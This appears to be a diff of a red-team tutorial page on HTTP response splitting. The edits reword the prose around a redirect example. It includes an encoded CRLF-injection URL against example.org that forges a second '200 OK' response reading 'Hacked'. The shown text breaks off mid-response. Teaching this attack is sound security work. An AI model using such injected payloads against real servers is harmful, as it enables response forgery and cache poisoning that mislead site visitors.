tymyrddin/red-basic/source/docs/server/response-splitting.md

     http://example.org/redirect.php?url=http%3A%2F%2Fexample.org%2Ftarget.php

-The response generated:
+A browser receiving this response transparently requests the new resource (indicated in the Location header), and it is the response to this second request that is actually rendered in the browser:

     HTTP/1.1 302 Found
     Server: Apache/1.3.33 (Debian GNU/Linux)
     Location: http://example.org/target.php
     Content-Length: 0

-A browser receiving this response transparently requests the new resource (indicated in the Location header), and it is the response to this second request that is actually rendered in the browser.

-So now attack with:
+So now you can attack with:

     http://example.org/redirect.php?url=http%3A%2F%2Fexample.org%2Ftarget.php%0D%0A%0D%0AHTTP%2F1.1+200+OK%0D%0AContent-Type%3A+text%2Fhtml%0D%0AContent-Length%3A+34%0D%0A%3Chtml%3E%3Cp%3EHacked%3C%2Fp%3E%3C%2Fhtml%3E

-Generates:
+And it generates:

     HTTP/1.1 302 Found
     Server: Apache/1.3.33 (Debian GNU/Linux)